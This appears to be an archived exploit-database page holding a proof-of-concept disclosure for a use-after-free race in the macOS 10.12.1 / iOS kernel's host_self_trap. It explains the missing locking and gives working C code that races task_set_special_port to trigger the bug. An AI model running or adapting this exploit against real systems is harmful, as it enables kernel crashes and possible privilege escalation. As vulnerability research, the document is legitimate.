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MacOS 10.12.1 / iOS kernel 'host_self_trap' Use-After-Free

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<HTML><HEAD><TITLE>macOS 10.12.1 / iOS kernel 'host_self_trap' Use-After-Free</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>/* The task struct has a lock (itk_lock_data, taken via the itk_lock macros) which is supposed to protect the task->itk_* ports. The host_self_trap mach trap accesses task->itk_host without taking this lock leading to a use-after-free given the following interleaving of execution: Thread A: host_self_trap: read current_task()->itk_host // Thread A reads itk_host Thread B: task_set_special_port: *whichp = port; // Thread B replaces itk_host with eg MACH_PORT_NULL itk_unlock(task); if (IP_VALID(old)) ipc_port_release_send(old); // Thread B drops last ref on itk_host Thread A: host_self_trap: passes the port to ipc_port_copy_send // uses the free'd port host_self_trap should use one of the canonical accessors for the task's host port, not just directly read it. PoC tested on MacOS 10.12.1 */ // ianbeer #if 0 iOS/MacOS kernel UaF due to lack of locking in host_self_trap The task struct has a lock (itk_lock_data, taken via the itk_lock macros) which is supposed to protect the task->itk_* ports. The host_self_trap mach trap accesses task->itk_host without taking this lock leading to a use-after-free given the following interleaving of execution: Thread A: host_self_trap: read current_task()->itk_host // Thread A reads itk_host Thread B: task_set_special_port: *whichp = port; // Thread B replaces itk_host with eg MACH_PORT_NULL itk_unlock(task); if (IP_VALID(old)) ipc_port_release_send(old); // Thread B drops last ref on itk_host Thread A: host_self_trap: passes the port to ipc_port_copy_send // uses the free'd port host_self_trap should use one of the canonical accessors for the task's host port, not just directly read it. PoC tested on MacOS 10.12.1 #endif // example boot-args // debug=0x144 -v pmuflags=1 kdp_match_name=en3 -zp -zc gzalloc_min=120 gzalloc_max=200 #include <stdio.h> #include <stdlib.h> #include <pthread.h> #include <mach/mach.h> #include <mach/host_priv.h> mach_port_t q() { mach_port_t p = MACH_PORT_NULL; mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &p); mach_port_insert_right(mach_task_self(), p, p, MACH_MSG_TYPE_MAKE_SEND); return p; } int start = 0; mach_port_t rq = MACH_PORT_NULL; void* racer(void* arg) { for(;;) { while(!start){;} usleep(10); mach_port_t p = mach_host_self(); mach_port_deallocate(mach_task_self(), p); start = 0; } } int main() { pthread_t thread; pthread_create(&thread, NULL, racer, NULL); for (;;){ mach_port_t p = q(); kern_return_t err = task_set_special_port(mach_task_self(), TASK_HOST_PORT, p); mach_port_deallocate(mach_task_self(), p); mach_port_destroy(mach_task_self(), p); // kernel holds the only ref start = 1; task_set_special_port(mach_host_self(), TASK_HOST_PORT, MACH_PORT_NULL); } return 0; } </BODY></HTML>

 

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